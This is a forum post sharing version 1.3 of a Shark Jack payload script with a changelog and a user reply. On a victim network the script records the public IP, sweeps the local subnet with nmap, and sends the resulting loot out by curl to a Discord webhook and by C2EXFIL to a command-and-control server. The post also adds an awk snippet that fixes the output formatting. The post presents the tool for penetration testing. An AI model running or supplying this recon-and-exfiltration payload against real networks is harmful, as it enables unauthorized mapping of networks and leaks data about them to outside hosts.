[PAYLOAD] Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled)



Nmap Quickscan with Discord Integration (Cleaned & C2 Enabled)

This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. The Payload waits for an "Internet Connection" to be present. Once an Internet Connection is found, it scans the local subnet for any online devices, while also logging the Public IP of the Victim's Network (very useful when you are scanning multiple networks in a short amount of time).

payload.sh
 

#!/bin/bash
# Title:         Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled)
# Author:        REDD of Private-Locker
# Version:       1.3
#
# This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. 
# The Payload waits for "Internet Connection" to be present. Once Internet Connection is found,
# It scans the local subnet for any online devices. - While also logging the Public IP of the
# Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.)
#
# Magenta w/ Yellow ........Waiting for Internet
# 1st Yellow flashing.......Scanning for Gateway/Subnet
# Cyan flashing.............Running Nmap scan on x.0/24
# 2nd Yellow Flashing.......Installing dependencies for Discord Integration
# Yellow....................Sent to Discord Webhook
# Blue......................Exfiltrating to C2
# Red.......................Failed C2/EXFIL/Scanning
# Green.....................Finished

# Turn on Discord Integration (Yes = 1, No = 0)
DISCORD=0
WEBHOOK='PLACE_DISCORD_WEBHOOK_HERE'
# Send Loot as File or Plain Messages (File = 1, Messages = 0)
AS_FILE=0

if [ -f "/etc/device.config" ]; then
        INITIALIZED=1
else
        INITIALIZED=0
fi
LED SETUP
NETMODE DHCP_CLIENT
while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done
URL="http://www.example.com"
while ! wget $URL -qO /dev/null; do sleep 1; done
GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}')
# Keep re-reading the routing table until a default gateway shows up
while [ -z "$GET_GATEWAY" ]; do sleep 1; GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}'); done
INTERNAL_IP=$(ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')
SUBNET=$(echo "$GET_GATEWAY" | awk -F"." '{print $1"."$2"."$3".0/24"}')
CHK_SUB=$(echo $INTERNAL_IP | cut -d"." -f1-3)
FIN_SUB="${CHK_SUB}.0/24"
LED ATTACK;
if [ "$SUBNET" != "$FIN_SUB" ]; then
        LED R FAST;
        sleep 2;
        LED R SOLID;
else
        # Fix for Timestamp Update
        ntpd -gq; sleep 1;
        DATE_FORMAT=$(date '+%m-%d-%Y_%H:%M:%S')
        LOOT_DIR="/root/loot/nmap-diag"
        LOOT_FILE="$LOOT_DIR/diag-${DATE_FORMAT}.txt"
        if [ ! -d "$LOOT_DIR" ]; then
                mkdir -p "$LOOT_DIR"
        fi
        if [ ! -f "$LOOT_FILE" ]; then
                touch "$LOOT_FILE"
        fi
        # Get Public IP and run NMAP scan
        PUBLIC_IP=$(wget -q "http://api.ipify.org" -O -)
        printf "\n       Public IP: ${PUBLIC_IP}\n    Online Devices for ${SUBNET}:\n--------------------------------------------\n\n" >> "$LOOT_FILE"
        LED C VERYFAST
        run_nmap () {
                nmap -sn --privileged "$SUBNET" --exclude "$INTERNAL_IP" | awk '/Nmap scan report for/{printf " -> ";printf $5;}/MAC Address:/{print " - "substr($0, index($0,$3)) }' >> "$LOOT_FILE"
        }
        run_nmap &
        PID=$!
        # Block until the background nmap has finished before looking for loot
        while kill -0 "$PID" >/dev/null 2>&1; do
                wait "$PID"
        done
        if [ -s "$LOOT_FILE" ]; then
                if [ "$DISCORD" == 1 ]; then
                        CURL_CHK=$(which curl)
                        if [ "$CURL_CHK" != "/usr/bin/curl" ]; then
                                LED Y VERYFAST;
                                opkg update;opkg install libcurl curl;
                        fi
                        LED Y SOLID
                        if [ "$AS_FILE" == 1 ]; then
                                # Double quotes are kept so curl treats the path as a quoted filename
                                FILE=\"$LOOT_FILE\"
                                curl -s -i -H 'Content-Type: multipart/form-data' -F "FILE=@${FILE}" -F 'payload_json={ "wait": true, "content": "Loot has arrived!", "username": "SharkJack" }' "$WEBHOOK"
                        fi
                        if [ "$AS_FILE" == 0 ]; then
                                while read -r line; do
                                        DISCORD_MSG=\"**$line**\"
                                        curl -H "Content-Type: application/json" -X POST -d "{\"content\": $DISCORD_MSG}" "$WEBHOOK"
                                done < "$LOOT_FILE"
                        fi
                        LED G SOLID;sleep 2;
                fi
                if [ "$INITIALIZED" == 1 ]; then
                        LED Y SOLID
                        if [ -z "$(pgrep cc-client)" ]; then
                                C2CONNECT
                                while ! pgrep cc-client; do LED B SOLID;sleep .2;LED G SOLID;sleep .8; done
                        fi
                        # Re-issuing C2CONNECT to verify loot push to C2
                        C2CONNECT
                        sleep 2
                        C2EXFIL STRING "${LOOT_FILE}" "Nmap Diagnostic for Network ${SUBNET}"
                        LED M VERYFAST;
                        sleep 2;
                fi
                LED FINISH;
        else
                LED R SOLID;
                rm -rf "$LOOT_FILE";
        fi
fi

 

Edited by REDD
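As an added example (not part of REDD's payload), here is the loot-line formatting from run_nmap as a stand-alone shell function, extended to handle a host whose report carries no "MAC Address:" line, which the original awk one-liner runs together with the next host on one line. The nmap output it reads is a constructed sample, not a real scan.

```shell
#!/bin/sh
# Added example, not from the original payload: a stand-alone version of the
# awk one-liner in run_nmap. The original prints " -> host" without a newline
# and only finishes the line when a "MAC Address:" line follows, so a host
# with no MAC line gets glued to the next report. This version flushes it.

# Reads "nmap -sn" normal output on stdin, writes one loot line per host.
format_nmap_report() {
    awk '
        /^Nmap scan report for/ {
            if (host != "") print " -> " host      # previous host had no MAC
            host = $5
        }
        /^MAC Address:/ {
            print " -> " host " - " substr($0, index($0, $3))
            host = ""
        }
        END { if (host != "") print " -> " host }  # last host had no MAC
    '
}

# Constructed sample: two hosts with a MAC line, one without.
SAMPLE_NMAP_OUTPUT='Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.0.2.1
Host is up (0.0012s latency).
MAC Address: 00:00:5E:00:53:01 (Unknown)
Nmap scan report for 192.0.2.10
Host is up (0.0034s latency).
Nmap scan report for printer.example (192.0.2.20)
Host is up (0.0051s latency).
MAC Address: 00:00:5E:00:53:20 (Unknown)
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.50 seconds'

# Wrapper so the formatted result can be captured as a string.
format_sample() {
    printf '%s\n' "$SAMPLE_NMAP_OUTPUT" | format_nmap_report
}

format_sample
```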

Version 1.3 (Jan 23rd 2021):

  • Added Discord Webhook Integration to the Payload as an alternate source of acquiring loot from the SharkJack.
  • Added Optional "send as file" or "send as plain text messages" to the payload.


Version 1.2 (Jan 22nd 2021):

  • Fixed Errors with C2CONNECT and EXFIL not working correctly as intended in script.
  • Added forced wait until nmap finished to look for loot.
  • Cleaned up script process.

 

Edited by REDD
47 minutes ago, SKiZZ said:

I'll have to give this a try tonight as all your other addons are spot on and have used them for pentest engagements.

If you try to add this with the Web UI, it won't work.. You'll have to follow the "Workaround" for adding this Payload into the Payload Library.. It contains characters the "Payload" tab doesn't like..  Lol
